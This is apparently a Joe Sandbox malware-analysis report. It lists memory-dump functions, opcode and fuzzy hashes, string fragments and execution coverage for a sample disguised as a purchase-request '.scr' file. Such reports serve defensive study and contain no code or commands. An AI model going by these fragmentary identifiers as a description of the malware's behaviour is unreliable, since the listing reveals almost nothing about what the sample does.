Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: (p$,p
API String ID: 0-2293223000
Opcode ID: 07cd2fe3ca07df067c49cb5561fcd6d31f4b20717ea8b378b886e82e3d664615
Instruction ID: b008867e6bb2449a38d7f1f04aac3cefc2258e131ea1d91c27f7315b80019e84
Opcode Fuzzy Hash: 07cd2fe3ca07df067c49cb5561fcd6d31f4b20717ea8b378b886e82e3d664615
Instruction Fuzzy Hash: 67D11734A00A049FDB14DF68C584AADBBF2BF88310F29C599E515AB366EB34EC41CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01EF4790 Relevance: 1.8, Strings: 1, Instructions: 562COMMON

Download Yara Rule

Strings

(p, xrefs: 01EF4868

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: (p
API String ID: 0-4175582459
Opcode ID: e2541f0a622e8cdf9e0136a07d808b6045eb6d469813eca964ff0329b0cd9f0a
Instruction ID: efad239035ea57e15a169a30dcf2ba7355680fcd8a23d73bc513ebc9f8219060
Opcode Fuzzy Hash: e2541f0a622e8cdf9e0136a07d808b6045eb6d469813eca964ff0329b0cd9f0a
Instruction Fuzzy Hash: 33226A74B007119FCB19CF69C49466EFBF2BB88304F14852DEA5AD7395DB34A906CB81

Uniqueness

Uniqueness Score: -1.00%

Function 046A0040 Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

(, xrefs: 046A0134

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: d7946044c0b2f3bfcda39e169b117934c99e4f9f72c8b1cbf199bd230314c19e
Instruction ID: dddf6ec42c7cdbe66263bd76400eade8dabd0f47b6b8ae310610902148057973
Opcode Fuzzy Hash: d7946044c0b2f3bfcda39e169b117934c99e4f9f72c8b1cbf199bd230314c19e
Instruction Fuzzy Hash: 3B415371E05A58CBEB58CF6BDD4429EFAF3AFC8201F14D1B9C80CA6255EB3019969F11

Uniqueness

Uniqueness Score: -1.00%

Function 046A0022 Relevance: 1.4, Strings: 1, Instructions: 102COMMON

Download Yara Rule

Strings

(, xrefs: 046A0134

Memory Dump Source

Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: d2ebeb5aaccc06c2c745801d6df843da77573b393665361edc553b143229d89b
Instruction ID: 14a2c79b75a5910b43e010bbc573948bb825ac46c721f78abc49d6a92f778c5b
Opcode Fuzzy Hash: d2ebeb5aaccc06c2c745801d6df843da77573b393665361edc553b143229d89b
Instruction Fuzzy Hash: 44417371D05A548FEB1CCF6B8D4029AFAF3AFC9200F18C0BAD85CAA255EB3409468F11

Uniqueness

Uniqueness Score: -1.00%

Function 01F15110 Relevance: 1.3, Strings: 1, Instructions: 99COMMON

Download Yara Rule

Strings

F, xrefs: 01F16D83

Memory Dump Source

Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: 79972af93fb12f55b14dc9e77a88d5ce06f92af5c8be07806e5c9821cf72c405
Instruction ID: 3875441938939e1ba6dfbe4f2b5534b90eb89ef6c7b3d13f9e1569eeb988ea73
Opcode Fuzzy Hash: 79972af93fb12f55b14dc9e77a88d5ce06f92af5c8be07806e5c9821cf72c405
Instruction Fuzzy Hash: 9A41CB71D056288BEB19CF5BC84839EBBF7AFC9300F14C1AAC40DA6258DB750A858F50

Uniqueness

Uniqueness Score: -1.00%

Function 01F19C60 Relevance: .4, Instructions: 431COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5019f6fb95b100e366332ad962b445ad245ebf16fc94687b1010295973d189a2
Instruction ID: 30ee7f6aed79873105a5550cb4f6b9c54378ac486495696ea8a3a88d24d3859d
Opcode Fuzzy Hash: 5019f6fb95b100e366332ad962b445ad245ebf16fc94687b1010295973d189a2
Instruction Fuzzy Hash: 5312C771E006588BDB14CFAEC98069DFBF2BF88304F28C569D459EB21AD7359946CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01F0A320 Relevance: .3, Instructions: 257COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356459108.0000000001F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f00000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fda108cf9ab3c09b29958de86bdceac62586190af7af9a6e84c013a5c7e6fb7
Instruction ID: ec3c69a127da1980be8cb606ed9331a5c387e5bddf7e75a9c27bb72b9f75bbbb
Opcode Fuzzy Hash: 4fda108cf9ab3c09b29958de86bdceac62586190af7af9a6e84c013a5c7e6fb7
Instruction Fuzzy Hash: 98B14A70E01308CFDB15DFA9E8847ADBBF2FB99300F10916AD419AB295DB765985DF00

Uniqueness

Uniqueness Score: -1.00%

Function 01F0A330 Relevance: .3, Instructions: 256COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356459108.0000000001F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f00000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d61e46016d273104f3575aa85b4e20f56c38a256d64f854b7e1cb6853467248
Instruction ID: c5e94c717eb370f011a30e5fee184b8a2c99851b1344f37bb54c43cc32c4f06f
Opcode Fuzzy Hash: 4d61e46016d273104f3575aa85b4e20f56c38a256d64f854b7e1cb6853467248
Instruction Fuzzy Hash: 84B13A70E01308CFDB15DFA9E9947ADBBF2FB89300F10916AD419AB295DB765885DF00

Uniqueness

Uniqueness Score: -1.00%

Function 01EF8F88 Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 289a2865ef62a3443f7c6f87d1547da4b57bcb49844e6377a86a8b1a96e142c8
Instruction ID: 104228622256883a4d9f98aa7953da347e56c1578e26e40d4c04af97bcee6b5b
Opcode Fuzzy Hash: 289a2865ef62a3443f7c6f87d1547da4b57bcb49844e6377a86a8b1a96e142c8
Instruction Fuzzy Hash: 55615A70E05218CFDB14DFA9D544BEDB7F6EB49304F00A16EEA09AB295CB355985CF04

Uniqueness

Uniqueness Score: -1.00%

Function 058CCAA8 Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359245806.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_58b0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ead3cf2c2f7f3567e206b28b52e3b596efbffe81fb11a35d02914b626d611ddf
Instruction ID: f2bafa7bd154efb269f6401a904ede03761cb62217af92ee01fef9aabe6af138
Opcode Fuzzy Hash: ead3cf2c2f7f3567e206b28b52e3b596efbffe81fb11a35d02914b626d611ddf
Instruction Fuzzy Hash: 1371E370E14218CFDB24CFA9D894BADBFB2AF89304F1090A9D82DA7255DB759D85CF40

Uniqueness

Uniqueness Score: -1.00%

Function 01EF9085 Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c952cd463dd6c63e1348605844e9a0bab778f54e8b4d483aba9287dfec9f6cdf
Instruction ID: 0d4544cc1448fa419bf51a29ed4db7fa12e6e821fdf5682d3713d3e0ca6a3e99
Opcode Fuzzy Hash: c952cd463dd6c63e1348605844e9a0bab778f54e8b4d483aba9287dfec9f6cdf
Instruction Fuzzy Hash: 4C616A70E05208CFDB10DFA9D544BEDB7F2EB49308F10A16EEA59AB255DB359981CF04

Uniqueness

Uniqueness Score: -1.00%

Function 01EF7928 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6321bb7ae282fff8a3bb4db2ba4b7f8d6e9c51249b83fe278968c580adbbf716
Instruction ID: 40f104257d96e3669ca66957c7930e63215bd337c6bb7c71b6efc4d2fce32cde
Opcode Fuzzy Hash: 6321bb7ae282fff8a3bb4db2ba4b7f8d6e9c51249b83fe278968c580adbbf716
Instruction Fuzzy Hash: 13513370E0620CCFDB14DFA9E5447EDBBF2EB89300F15A129DA19AB254DB745A46CF40

Uniqueness

Uniqueness Score: -1.00%

Function 01EF7919 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2dfccf9ab6d0fe2cacbe0f52bbab0ade315af31e7700dd04f83789dceb16694
Instruction ID: b659df92e973d868070fd8527490c1254fcf055076dcd4f05b19394b67a54d24
Opcode Fuzzy Hash: e2dfccf9ab6d0fe2cacbe0f52bbab0ade315af31e7700dd04f83789dceb16694
Instruction Fuzzy Hash: 58515470E06208CFDB14DFA9E5447EDBBF2FB89304F14A529D929AB294DB745A46CF00

Uniqueness

Uniqueness Score: -1.00%

Function 04C80006 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359111117.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c80000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1e366d8d98ba262c84c10fd3be348a2939fea212d957f53f0abe15b74add075
Instruction ID: 50ca4f72041a20dbd6b2c27673b3c9c3528436aa4d3615788735611b44f6d969
Opcode Fuzzy Hash: e1e366d8d98ba262c84c10fd3be348a2939fea212d957f53f0abe15b74add075
Instruction Fuzzy Hash: C9518D71D056588BE71DCF6B8C412CAFBF3AFC9344F15C0FA954CAA225EB7409868E11

Uniqueness

Uniqueness Score: -1.00%

Function 01F19C50 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0877e3648fef5e87c23e7c1bfba386cce17cc897c346169d85578166818629d6
Instruction ID: afcd2329fcb64571873d01fcb148e070ae5ac4a1b3e6be466bfd7c1f75f68430
Opcode Fuzzy Hash: 0877e3648fef5e87c23e7c1bfba386cce17cc897c346169d85578166818629d6
Instruction Fuzzy Hash: 515166B1E016198BDB18CFABD95069EFBF3BFC8300F14C07AD548AB268DB7459468B54

Uniqueness

Uniqueness Score: -1.00%

Function 04C80040 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359111117.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c80000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 736be4679f16de4c01118b76784c14b72ee998f762d063641500f80ef56c802f
Instruction ID: 82922bf21d62b3485594c97f518edd2337ccfb022d238f67bd225c86a569cadb
Opcode Fuzzy Hash: 736be4679f16de4c01118b76784c14b72ee998f762d063641500f80ef56c802f
Instruction Fuzzy Hash: 8C513E71E016588BEB6CCF5B8D446CAFAF3AFC8301F14C1FA994CA6254EB701AC58E41

Uniqueness

Uniqueness Score: -1.00%

Function 04C8D900 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359111117.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c80000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e50d5be6903af1a4e402f17ca700ad242dee73625ee1e97d4262a4ac569b317e
Instruction ID: 6c391067cc61e323231272bccd3ad83b07bbbecdc51bba45fd731470eaf01262
Opcode Fuzzy Hash: e50d5be6903af1a4e402f17ca700ad242dee73625ee1e97d4262a4ac569b317e
Instruction Fuzzy Hash: 0241E0B4D043489FDB10DFA9D884BAEBBF2AB49304F209029E816A7290D774A945CF45

Uniqueness

Uniqueness Score: -1.00%

Function 01F09970 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356459108.0000000001F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f00000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d1a9e4351039a74202b17def11462c1afde33036ff3ba1c329c051cf19ca0a7
Instruction ID: 4d92d47cd4f6116c574a484a4245b8a17dada588eb1f129d8f86298f0a72e579
Opcode Fuzzy Hash: 9d1a9e4351039a74202b17def11462c1afde33036ff3ba1c329c051cf19ca0a7
Instruction Fuzzy Hash: C941FEB5D002589FCF10CFA9D484AEEFBF0AF49350F24942AE415B7250D3789A89CF64

Uniqueness

Uniqueness Score: -1.00%

Function 01F09978 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356459108.0000000001F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f00000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8220704fce13270a57f8bbf6d8bae781b802cd1e3f20be98a2a03a20ac47ab50
Instruction ID: d09ef458d3032bfdfab259532097dd7c4adabfebbe9bef77cc0ae1cebe0cb947
Opcode Fuzzy Hash: 8220704fce13270a57f8bbf6d8bae781b802cd1e3f20be98a2a03a20ac47ab50
Instruction Fuzzy Hash: DC41EEB5D002589FCF10CFA9D484AEEFBF0AF49314F24946AE415B7250D778AA89CF64

Uniqueness

Uniqueness Score: -1.00%

Function 058B0040 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359245806.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_58b0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06aa12fa02df695ad36b1c11f64f895941afa71c7e7ea443d9a391161a71f2b1
Instruction ID: 0afa92c76bc0e6281d7c3778b8b38c8b9ae605f75b67af3432320dcc5fd57403
Opcode Fuzzy Hash: 06aa12fa02df695ad36b1c11f64f895941afa71c7e7ea443d9a391161a71f2b1
Instruction Fuzzy Hash: 1541C870D05629DBEB68CF5AC84879AFAF6BB89300F14C1EAD80CA6254DB704A858F41

Uniqueness

Uniqueness Score: -1.00%

Function 058B0006 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.359245806.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_58b0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b9f654b43f58bf67aecc565993fbfef11dbdb01caeefb6aea8bfc1941600f7e
Instruction ID: a752fcdc8915e31a79ff9700ea85e487aa960472110e4cbba84674db336aa1e5
Opcode Fuzzy Hash: 5b9f654b43f58bf67aecc565993fbfef11dbdb01caeefb6aea8bfc1941600f7e
Instruction Fuzzy Hash: CD313D71D097949FE72ACF2AC84438ABBF7AF85300F05C0EAD4089A266EB740D85CF11

Uniqueness

Uniqueness Score: -1.00%

Function 01F150FF Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 504da7b81d59bd8b594f04f98e326c5fe4926977ffc40f4c1f6803494127db1e
Instruction ID: 2ecd26f1725e16a2326bfbdf209916d55863c6e339e8b877c07e3ec9295fe119
Opcode Fuzzy Hash: 504da7b81d59bd8b594f04f98e326c5fe4926977ffc40f4c1f6803494127db1e
Instruction Fuzzy Hash: CB316E71E056598BEB5DCF6B884529AFBF7AFC9300F14C1FA840CA6264DB350A818F51

Uniqueness

Uniqueness Score: -1.00%

Function 01F14080 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68fd60bc6352d871ae71549bade07b33d097270a79d3599d24259a6bf6a88f12
Instruction ID: fedcfd5fc4c49267043f7254dfe500e8b324462d0955e9bdf44d3a9ce3d6db37
Opcode Fuzzy Hash: 68fd60bc6352d871ae71549bade07b33d097270a79d3599d24259a6bf6a88f12
Instruction Fuzzy Hash: 8221BD72E056188BEB18CF6BDD012DDFAF7AFC9310F14C0BAC548A6218DB710A858F55

Uniqueness

Uniqueness Score: -1.00%

Function 01F14070 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f90144cc8e25a28e8945692f14a7720fde9b9b6193e67d1ba612e225bcc54677
Instruction ID: 230882ea41707b1ce254eed93d3a89d8ff2eaca360b9d33579009e2a84a5b0b6
Opcode Fuzzy Hash: f90144cc8e25a28e8945692f14a7720fde9b9b6193e67d1ba612e225bcc54677
Instruction Fuzzy Hash: 3921EF72E016188BEB1CCF6BD9002D9FAF3BFC9310F14C1BAC54966259DB710A858F44

Uniqueness

Uniqueness Score: -1.00%

Function 01E618C0 Relevance: 17.8, Strings: 14, Instructions: 332COMMON

Download Yara Rule

Strings

0<>, xrefs: 01E61915
0<>, xrefs: 01E61B3F
0<>, xrefs: 01E61CB4
0<>, xrefs: 01E61A7D
0<>, xrefs: 01E61C07
0<>, xrefs: 01E61A1E
4'p, xrefs: 01E61CF4
4'p, xrefs: 01E61CE4
0<>, xrefs: 01E61C5F
0<>, xrefs: 01E6194C
0<>, xrefs: 01E61925
0<>, xrefs: 01E61BA3
0<>, xrefs: 01E619AB
0<>, xrefs: 01E61ADB

Memory Dump Source

Source File: 00000000.00000002.356349308.0000000001E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e60000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: 0<>$0<>$0<>$0<>$0<>$0<>$0<>$0<>$0<>$0<>$0<>$0<>$4'p$4'p
API String ID: 0-1721806270
Opcode ID: 6cf2229f1729b9f431427beef7fbd88ae66d0ee4ca0df11fbdc5db22089f69b8
Instruction ID: f48ce9005ca5b4074595b70827b402dd757d2e484613bac1be1def1a54f7a67b
Opcode Fuzzy Hash: 6cf2229f1729b9f431427beef7fbd88ae66d0ee4ca0df11fbdc5db22089f69b8
Instruction Fuzzy Hash: 9CE1E634D00258DFCB2ADFA9E498AECBBB6FF89305F609169E416B7294DB305945CF40

Uniqueness

Uniqueness Score: -1.00%

Function 01E624A8 Relevance: 10.3, Strings: 8, Instructions: 279COMMON

Download Yara Rule

Strings

\C>, xrefs: 01E62625
xD>, xrefs: 01E626C4
(E>, xrefs: 01E62773
4'p, xrefs: 01E62827
\C>, xrefs: 01E62635
4'p, xrefs: 01E62837
xD>, xrefs: 01E626D4
(E>, xrefs: 01E62763

Memory Dump Source

Source File: 00000000.00000002.356349308.0000000001E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e60000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: (E>$(E>$4'p$4'p$\C>$\C>$xD>$xD>
API String ID: 0-511514871
Opcode ID: 8af1269dd1dc4ebd48e4f4893af7e03c7670562b4adb29c8a7cfcb3c6f5acd1a
Instruction ID: 8253774896fcf56d6e9bd402ddf4b466d750ff698501256a0946ee53418e5e93
Opcode Fuzzy Hash: 8af1269dd1dc4ebd48e4f4893af7e03c7670562b4adb29c8a7cfcb3c6f5acd1a
Instruction Fuzzy Hash: DFC1D434E0024ACFDB19DFA9C458AEDBBB6FF48345F509129D6126B294CB345D82CF51

Uniqueness

Uniqueness Score: -1.00%

Function 01F1C888 Relevance: 7.7, Strings: 6, Instructions: 152COMMON

Download Yara Rule

Strings

pp, xrefs: 01F1C9DF
4'p, xrefs: 01F1C9D2
4'p, xrefs: 01F1C93C
(p, xrefs: 01F1CA52
4'p, xrefs: 01F1C95A
4'p, xrefs: 01F1C90C

Memory Dump Source

Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: (p$4'p$4'p$4'p$4'p$pp
API String ID: 0-2991777393
Opcode ID: 4609c5cb8178907c627461ac59cc19c30dff47742564f51bec87d94c369c319e
Instruction ID: 4cf90ffd1ebf30b04a2de4b532134a702419792d44ec0734c0040ad1c2b2d0b6
Opcode Fuzzy Hash: 4609c5cb8178907c627461ac59cc19c30dff47742564f51bec87d94c369c319e
Instruction Fuzzy Hash: 5E51D071A003059FDB19EB7CC8117AEBAA7AFC4300F58892DD44A9B399DF359D0687A1

Uniqueness

Uniqueness Score: -1.00%

Function 01EF22E8 Relevance: 5.2, Strings: 4, Instructions: 187COMMON

Download Yara Rule

Strings

(_p, xrefs: 01EF29D4
(_p, xrefs: 01EF2993
(_p, xrefs: 01EF2A0A
(_p, xrefs: 01EF299D

Memory Dump Source

Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: (_p$(_p$(_p$(_p
API String ID: 0-1436489877
Opcode ID: 80d854824ec60e26fb6c023703939a2e03e9cf9327c4994278ed6c1f6b6f2050
Instruction ID: c4fa760dd28dbd3d34470149baa9d29c745fd67bb67fc34543840f3760ba5f0d
Opcode Fuzzy Hash: 80d854824ec60e26fb6c023703939a2e03e9cf9327c4994278ed6c1f6b6f2050
Instruction Fuzzy Hash: D361D070B00306CFCB14AF78C4544ADBBF2AF86314B55956DDA069B3A5EB35DC82CB81

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: UGS - CRO REQ - KHIDUBAI (OPL-841724).scrPID: 3372, Parent PID: 3224COMMON

Execution Graph

Execution Coverage:	10.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	32
Total number of Limit Nodes:	1

Executed Functions

Function 006045D0 Relevance: 22.4, Strings: 17, Instructions: 1178COMMON

Download Yara Rule

Strings

$p, xrefs: 00604EA1
,DR, xrefs: 00604F64
$p, xrefs: 00604863
8xR, xrefs: 00605567
,DR, xrefs: 006049EF
$p, xrefs: 00604F0A
$p, xrefs: 00604EFA
$p, xrefs: 00604AC7
$p, xrefs: 00604853
$p, xrefs: 00604A27
$p, xrefs: 00604A17
,DR, xrefs: 00604A63
$p, xrefs: 00604EB1
$p, xrefs: 00604AD7
,p, xrefs: 0060508A
8xR, xrefs: 00605573
4, xrefs: 00604FA5

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: ,DR$,DR$,DR$,p$4$8xR$8xR$$p$$p$$p$$p$$p$$p$$p$$p$$p$$p
API String ID: 0-2087169039
Opcode ID: e5a75082040d78fc575dc543744b86ca7a1d09f99ca32df87728da8d4a7781c5
Instruction ID: d19b275e9a1c3eb325cb56d2e92e011882f4161c1c3544b4d476f80b47b30be6
Opcode Fuzzy Hash: e5a75082040d78fc575dc543744b86ca7a1d09f99ca32df87728da8d4a7781c5
Instruction Fuzzy Hash: 2AB21874A40218DFDB28DFA4D894BAEB7B6BF88300F148599E505AB3A5DB70ED41CF50

Uniqueness

Uniqueness Score: -1.00%

Function 006048F7 Relevance: 11.7, Strings: 9, Instructions: 495COMMON

Download Yara Rule

Strings

$p, xrefs: 00604EA1
,DR, xrefs: 00604F64
$p, xrefs: 00604A17
,DR, xrefs: 006049EF
,DR, xrefs: 00604A63
$p, xrefs: 00604EFA
,p, xrefs: 0060508A
4, xrefs: 00604FA5
$p, xrefs: 00604AC7

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID: ,DR$,DR$,DR$,p$4$$p$$p$$p$$p
API String ID: 0-2211858201
Opcode ID: 7358fd1a92390b168cd487323e76de6e2f127d11510db41406ee8851247dddc5
Instruction ID: d5be2c872d7ee0a0962a61cbb353dabb354e24d079ef580315e121e5a4d600ed
Opcode Fuzzy Hash: 7358fd1a92390b168cd487323e76de6e2f127d11510db41406ee8851247dddc5
Instruction Fuzzy Hash: FD220B74A40214CFDB28DF64D884BAEB7B2FF88304F148199E509AB3A5DB709D86CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00607A48 Relevance: 5.7, Strings: 4, Instructions: 700COMMON

Download Yara Rule

Strings

$p, xrefs: 00607D16
(_p, xrefs: 00608203
,DR, xrefs: 00607D71
Plp, xrefs: 00607C30

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

